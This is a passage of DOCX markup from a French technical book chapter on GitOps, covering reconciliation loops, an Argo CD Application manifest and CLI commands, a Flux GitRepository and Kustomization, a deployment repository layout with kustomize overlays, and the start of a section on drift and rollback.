              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Convergence continue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3141"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Dérive possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="273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Réconcilié en continu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Correction des écarts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Configuration qui pourrit</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RÉCONCILIATION</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Boucle qui compare l'état observé à l'état désiré et applique les différences. Elle tourne en continu, sans intervention humaine.</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GITOPS N'EST PAS « DÉPLOYER DEPUIS LA CI »</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Un pipeline qui exécute </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>kubectl apply</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> à la fin reste du déploiement classique : si quelqu'un modifie le cluster à la main, rien ne le corrige. Le GitOps suppose un agent qui observe et répare.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>81.2 Argo CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Argo CD est un contrôleur installé dans le cluster. Il surveille des applications, chacune associée à un dépôt Git et à un chemin, puis affiche l'écart entre l'état désiré et l'état réel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une application Argo CD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apiVersion: argoproj.io/v1alpha1</w:t>
        <w:br/>
        <w:t>kind: Application</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: boutique-production</w:t>
        <w:br/>
        <w:t xml:space="preserve">  namespace: argocd</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  project: default</w:t>
        <w:br/>
        <w:t xml:space="preserve">  source:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    repoURL: https://github.com/org/deploiement.git</w:t>
        <w:br/>
        <w:t xml:space="preserve">    targetRevision: main</w:t>
        <w:br/>
        <w:t xml:space="preserve">    path: environnements/production/boutique</w:t>
        <w:br/>
        <w:t xml:space="preserve">  destination:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    server: https://kubernetes.default.svc</w:t>
        <w:br/>
        <w:t xml:space="preserve">    namespace: boutique</w:t>
        <w:br/>
        <w:t xml:space="preserve">  syncPolicy:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    automated:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      prune: true</w:t>
        <w:br/>
        <w:t xml:space="preserve">      selfHeal: true</w:t>
        <w:br/>
        <w:t xml:space="preserve">    syncOptions:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - CreateNamespace=true</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - ApplyOutOfSyncOnly=true</w:t>
        <w:br/>
        <w:t xml:space="preserve">    retry:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      limit: 3</w:t>
        <w:br/>
        <w:t xml:space="preserve">      backoff:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        duration: 10s</w:t>
        <w:br/>
        <w:t xml:space="preserve">        factor: 2</w:t>
        <w:br/>
        <w:t xml:space="preserve">        maxDuration: 3m</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.309 — Cinq réglages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14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Réglage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="327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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="259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Risque</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3141"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>prune: true</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Supprime les ressources retirées de Git</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2595"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Suppression involontaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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selfHeal: true</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Corrige les modifications manuelles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="259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Écrase un dépannage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3141"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ApplyOutOfSyncOnly</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N'applique que les écarts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2595"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Plus rapide</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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CreateNamespace</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Crée l'espace de noms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="259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Droits élargis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3141"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>retry</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Réessaie en cas d'échec transitoire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2595"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Boucle si l'erreur est permanente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Cinq commandes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État des applications</w:t>
        <w:br/>
        <w:t>argocd app list</w:t>
        <w:br/>
        <w:t>argocd app get boutique-production</w:t>
        <w:br/>
        <w:br/>
        <w:t># Comparer sans appliquer</w:t>
        <w:br/>
        <w:t>argocd app diff boutique-production</w:t>
        <w:br/>
        <w:br/>
        <w:t># Synchroniser manuellement</w:t>
        <w:br/>
        <w:t>argocd app sync boutique-production --prune</w:t>
        <w:br/>
        <w:br/>
        <w:t># Revenir à une révision précédente</w:t>
        <w:br/>
        <w:t>argocd app rollback boutique-production 12</w:t>
      </w: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`SELFHEAL` PROTÈGE LA CONVERGENCE, PAS LE DÉPANNAGE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Pendant un incident, une correction manuelle urgente sera écrasée en quelques minutes. Si vous devez intervenir à la main, suspendez la synchronisation, consignez l'action, puis reportez la correction dans Git.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>81.3 Flux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Flux fonctionne par ensembles de personnalisations (Kustomization) et sources Git. Il est plus modulaire et s'intègre naturellement à </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>kustomize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et Helm.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une synchronisation Flux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apiVersion: source.toolkit.fluxcd.io/v1</w:t>
        <w:br/>
        <w:t>kind: GitRepository</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: deploiement</w:t>
        <w:br/>
        <w:t xml:space="preserve">  namespace: flux-system</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  interval: 1m</w:t>
        <w:br/>
        <w:t xml:space="preserve">  url: https://github.com/org/deploiement.git</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ref:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    branch: main</w:t>
        <w:br/>
        <w:t>---</w:t>
        <w:br/>
        <w:t>apiVersion: kustomize.toolkit.fluxcd.io/v1</w:t>
        <w:br/>
        <w:t>kind: Kustomization</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: boutique-production</w:t>
        <w:br/>
        <w:t xml:space="preserve">  namespace: flux-system</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  interval: 5m</w:t>
        <w:br/>
        <w:t xml:space="preserve">  path: ./environnements/production/boutique</w:t>
        <w:br/>
        <w:t xml:space="preserve">  prune: true</w:t>
        <w:br/>
        <w:t xml:space="preserve">  sourceRef:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    kind: GitRepository</w:t>
        <w:br/>
        <w:t xml:space="preserve">    name: deploiement</w:t>
        <w:br/>
        <w:t xml:space="preserve">  healthChecks:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - apiVersion: apps/v1</w:t>
        <w:br/>
        <w:t xml:space="preserve">      kind: Deployment</w:t>
        <w:br/>
        <w:t xml:space="preserve">      name: boutique</w:t>
        <w:br/>
        <w:t xml:space="preserve">      namespace: boutique</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.310 — Cinq différences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91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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Argo CD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Flux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2912"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Interface</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Graphique riche</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Ligne de commande</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Modèle</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Application</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Sources et Kustomizations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2912"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Multi-cluster</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Natif</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Par installation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Intégration Helm</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Bonne</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Très bonne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2912"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Courbe d'apprentissage</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Douce</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Plus abrupte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>81.4 Organiser le dépôt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le dépôt de déploiement est distinct du dépôt applicatif : il ne contient que des manifestes et des références d'images. Cette séparation évite qu'un changement de code déclenche un déploiement non relu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une structure de dépôt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deploiement/</w:t>
        <w:br/>
        <w:t>├── base/</w:t>
        <w:br/>
        <w:t>│   └── boutique/</w:t>
        <w:br/>
        <w:t>│       ├── deployment.yaml</w:t>
        <w:br/>
        <w:t>│       ├── service.yaml</w:t>
        <w:br/>
        <w:t>│       └── kustomization.yaml</w:t>
        <w:br/>
        <w:t>├── environnements/</w:t>
        <w:br/>
        <w:t>│   ├── recette/</w:t>
        <w:br/>
        <w:t>│   │   └── boutique/</w:t>
        <w:br/>
        <w:t>│   │       ├── kustomization.yaml   # image: 1.4.2</w:t>
        <w:br/>
        <w:t>│   │       └── patch-replicas.yaml</w:t>
        <w:br/>
        <w:t>│   └── production/</w:t>
        <w:br/>
        <w:t>│       └── boutique/</w:t>
        <w:br/>
        <w:t>│           ├── kustomization.yaml   # image: 1.4.1</w:t>
        <w:br/>
        <w:t>│           └── patch-replicas.yaml</w:t>
        <w:br/>
        <w:t>└── politiques/</w:t>
        <w:br/>
        <w:t xml:space="preserve">    └── reseau.yaml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une surcouche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base/boutique/kustomization.yaml</w:t>
        <w:br/>
        <w:t>resources:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - deployment.yaml</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - service.yaml</w:t>
        <w:br/>
        <w:br/>
        <w:t># environnements/production/boutique/kustomization.yaml</w:t>
        <w:br/>
        <w:t>resources:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - ../../../base/boutique</w:t>
        <w:br/>
        <w:br/>
        <w:t>images:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: registry.exemple.fr/boutique</w:t>
        <w:br/>
        <w:t xml:space="preserve">    newTag: "1.4.1"</w:t>
        <w:br/>
        <w:br/>
        <w:t>replicas:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: boutique</w:t>
        <w:br/>
        <w:t xml:space="preserve">    count: 3</w:t>
        <w:br/>
        <w:br/>
        <w:t>patches:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - target:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      kind: Deployment</w:t>
        <w:br/>
        <w:t xml:space="preserve">      name: boutique</w:t>
        <w:br/>
        <w:t xml:space="preserve">    patch: |-</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - op: add</w:t>
        <w:br/>
        <w:t xml:space="preserve">        path: /spec/template/spec/containers/0/resources</w:t>
        <w:br/>
        <w:t xml:space="preserve">        value:</w:t>
        <w:br/>
        <w:t xml:space="preserve">          requests: { cpu: 200m, memory: 256Mi }</w:t>
        <w:br/>
        <w:t xml:space="preserve">          limits:   { cpu: "1",  memory: 512Mi }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3238500"/>
            <wp:docPr id="94" name="Picture 94"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f92.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId132"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3238500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.92 — Une promotion par demande de fusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>81.5 Dérive et retour arrière</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La dérive est l'écart entre l'état réel et l'état déclaré. GitOps la détecte en continu ; l'important est de savoir si elle doit être corrigée ou intégrée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.311 — Quatre dérives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Type de dérive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="283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Origine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Traitement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
